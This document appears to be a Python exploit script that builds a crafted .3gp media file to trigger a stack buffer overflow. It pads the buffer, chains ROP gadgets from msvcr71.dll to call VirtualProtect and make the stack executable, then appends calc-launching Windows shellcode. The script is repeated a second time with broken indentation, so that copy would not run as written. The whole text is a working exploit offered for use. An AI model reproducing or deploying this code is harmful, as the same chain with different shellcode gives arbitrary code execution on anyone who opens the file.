shahril96/bokep-exploit.py

## bokep-exploit.py

import struct

buf = b'A' * 132

#
# virtualProtect() for rwx (msvcr71.dll – v7.10.3052.4)
# url: https://www.corelan.be/index.php/security/corelan-ropdb/#msvcr71dll_v71030524
#
rop_gadgets = [
	0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
	0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
	0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
	0xffffffff,	#
	0x7c376402,	# skip 4 bytes [msvcr71.dll]
	0x7c351e05,	# NEG EAX # RETN [msvcr71.dll]
	0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll]
	0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
	0x7c344f87,	# POP EDX # RETN [msvcr71.dll]
	0xffffffc0,	# Value to negate, will become 0x00000040
	0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll]
	0x7c34d201,	# POP ECX # RETN [msvcr71.dll]
	0x7c38b001,	# &Writable location [msvcr71.dll]
	0x7c347f97,	# POP EAX # RETN [msvcr71.dll]
	0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
	0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
	0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
	# rop chain generated with mona.py
]

'''
BOOL VirtualProtectEx(
  HANDLE hProcess,        = 0xffffffff
  LPVOID lpAddress,       = 0x0018FF88 (buffer address)
  SIZE_T dwSize,          = 513 (size of buffer)
  DWORD  flNewProtect,    = 0x00000040 (PAGE_EXECUTE_READWRITE)
  PDWORD lpflOldProtect   = 0x7C38B001
);

stack
-------
start of ROP chain addr (0x0018FF44)
after ROP, jmp to 0x0018FF8C

'''


for e in rop_gadgets:
	buf += struct.pack("<I", e)

#
# windows calc shellcode
# url: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
#
buf += b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"

with open("exploit.3gp", "wb") as fo:
    fo.write(buf)

	import struct

	buf = b'A' * 132

	#
	# virtualProtect() for rwx (msvcr71.dll – v7.10.3052.4)
	# url: https://www.corelan.be/index.php/security/corelan-ropdb/#msvcr71dll_v71030524
	#
	rop_gadgets = [
	0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
	0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
	0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
	0x7c3415a2, # JMP [EAX] [msvcr71.dll]
	0xffffffff, #
	0x7c376402, # skip 4 bytes [msvcr71.dll]
	0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
	0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
	0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
	0x7c344f87, # POP EDX # RETN [msvcr71.dll]
	0xffffffc0, # Value to negate, will become 0x00000040
	0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
	0x7c34d201, # POP ECX # RETN [msvcr71.dll]
	0x7c38b001, # &Writable location [msvcr71.dll]
	0x7c347f97, # POP EAX # RETN [msvcr71.dll]
	0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
	0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
	0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
	# rop chain generated with mona.py
	]

	'''
	BOOL VirtualProtectEx(
	HANDLE hProcess, = 0xffffffff
	LPVOID lpAddress, = 0x0018FF88 (buffer address)
	SIZE_T dwSize, = 513 (size of buffer)
	DWORD flNewProtect, = 0x00000040 (PAGE_EXECUTE_READWRITE)
	PDWORD lpflOldProtect = 0x7C38B001
	);

	stack
	-------
	start of ROP chain addr (0x0018FF44)
	after ROP, jmp to 0x0018FF8C

	'''


	for e in rop_gadgets:
	buf += struct.pack("<I", e)

	#
	# windows calc shellcode
	# url: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
	#
	buf += b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"

	with open("exploit.3gp", "wb") as fo:
	fo.write(buf)